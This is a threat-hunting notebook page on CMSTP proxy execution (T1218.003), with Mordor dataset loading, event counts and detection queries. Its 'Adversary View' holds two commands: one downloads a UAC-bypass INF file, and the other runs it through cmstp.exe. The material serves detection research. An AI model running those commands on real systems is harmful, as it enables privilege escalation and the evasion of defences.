CMSTP Proxy Execution

Metadata

Field | Value
---|---
Author | Roberto Rodriguez @Cyb3rWard0g
Creation Date | 2020/10/22
Modification Date | 2020/10/22
Tactics | ['TA0005']
Techniques | ['T1218.003']
Tags | ['art.748cb4f6-2fb3-4e97-b7ad-b22635a09ab0']
Dataset Description
This dataset represents threat actors leveraging CMSTP to execute an INF file in order to proxy-execute other malicious commands (e.g. cmd.exe), with the commands embedded in the RunPreSetupCommandsSection of the INF file.
Datasets Downloads

Dataset Type | Link
---|---
Host | 
Simulation Plan

Environment | Tool Type | Module
---|---|---
Lab VM | Manual | 
Adversary View

```powershell
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.003/src/T1218.003_uacbypass.inf" -OutFile C:\ProgramData\T1218.003_uacbypass.inf
cmstp.exe /s C:\ProgramData\T1218.003_uacbypass.inf /au
```
Explore Mordor Dataset

Initialize Analytics Engine

```python
from openhunt.mordorutils import *
# Create (or reuse) the Spark session used for the SparkSQL queries below
spark = get_spark()
```
Download & Process Mordor File

```python
mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/defense_evasion/host/psh_cmstp_execution_bypassuac.zip"
# Download the dataset and expose it as a temporary SparkSQL view named mordorTable
registerMordorSQLTable(spark, mordor_file, "mordorTable")
```

```text
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable
```
Get to know your data

```python
# Count events per host, channel and event ID to see what the dataset contains
df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
```
```text
+------------+------------------------------------+-------+-----+
|Hostname    |Channel                             |EventID|count|
+------------+------------------------------------+-------+-----+
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|10     |271  |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|22     |205  |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|7      |185  |
|WORKSTATION5|Security                            |4673   |170  |
|WORKSTATION5|Security                            |4658   |78   |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|12     |51   |
|WORKSTATION5|Security                            |4690   |39   |
|WORKSTATION5|Security                            |4656   |39   |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|13     |39   |
|WORKSTATION5|Security                            |4663   |38   |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|11     |12   |
|WORKSTATION5|Security                            |5158   |7    |
|WORKSTATION5|Security                            |5156   |7    |
|WORKSTATION5|Security                            |4688   |5    |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|1      |5    |
|WORKSTATION5|Security                            |4703   |4    |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|9      |3    |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|3      |2    |
|WORKSTATION5|Security                            |4689   |2    |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|5      |2    |
+------------+------------------------------------+-------+-----+
only showing top 20 rows
```
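The query above only counts events per channel. As an added example (not part of the original notebook), the two detection queries below cover the Adversary View: a Sysmon EventID 1 (process creation) record for cmstp.exe with an INF file on its command line, and any process whose ParentImage is cmstp.exe, which is what the commands in RunPreSetupCommandsSection produce. It uses the standard-library sqlite3 in place of SparkSQL and a handful of constructed Sysmon rows instead of the Mordor data; the SQL itself is what you would run against mordorTable.

```python
import sqlite3

# Constructed Sysmon EventID 1 rows (not from the Mordor dataset); columns follow
# the Sysmon schema: Hostname, EventID, Image, CommandLine, ParentImage.
SAMPLE_EVENTS = [
    # cmstp.exe launched by PowerShell with the INF from the Adversary View
    ("WORKSTATION5", 1, r"C:\Windows\System32\cmstp.exe",
     r"cmstp.exe /s C:\ProgramData\T1218.003_uacbypass.inf /au",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    # command proxied through the INF: cmd.exe whose parent is cmstp.exe
    ("WORKSTATION5", 1, r"C:\Windows\System32\cmd.exe",
     r"C:\Windows\System32\cmd.exe /c whoami",
     r"C:\Windows\System32\cmstp.exe"),
    # benign noise that must not match either query
    ("WORKSTATION5", 1, r"C:\Windows\System32\cmd.exe",
     r"C:\Windows\System32\cmd.exe", r"C:\Windows\explorer.exe"),
    ("WORKSTATION5", 1, r"C:\Windows\System32\notepad.exe",
     "notepad.exe", r"C:\Windows\explorer.exe"),
]

def load_events(events=SAMPLE_EVENTS):
    """Load rows into an in-memory table shaped like mordorTable."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE mordorTable (Hostname TEXT, EventID INTEGER, "
                 "Image TEXT, CommandLine TEXT, ParentImage TEXT)")
    conn.executemany("INSERT INTO mordorTable VALUES (?,?,?,?,?)", events)
    return conn

# Process creation of cmstp.exe referencing an .inf on the command line.
# In sqlite LIKE has no escape character, so the backslash is matched literally.
CMSTP_INF_QUERY = r"""
SELECT Hostname, Image, CommandLine FROM mordorTable
WHERE EventID = 1 AND lower(Image) LIKE '%\cmstp.exe'
  AND lower(CommandLine) LIKE '%.inf%'
"""

# Any process spawned by cmstp.exe (the proxied command from the INF section).
CMSTP_CHILD_QUERY = r"""
SELECT Hostname, ParentImage, Image, CommandLine FROM mordorTable
WHERE EventID = 1 AND lower(ParentImage) LIKE '%\cmstp.exe'
"""

def find_cmstp_inf_launches(conn):
    return conn.execute(CMSTP_INF_QUERY).fetchall()

def find_cmstp_children(conn):
    return conn.execute(CMSTP_CHILD_QUERY).fetchall()

if __name__ == "__main__":
    conn = load_events()
    print("cmstp + inf:", find_cmstp_inf_launches(conn))
    print("children of cmstp:", find_cmstp_children(conn))
```

Against the real dataset the parent/child query is the more robust of the two, since it fires regardless of which switches or INF path the operator used.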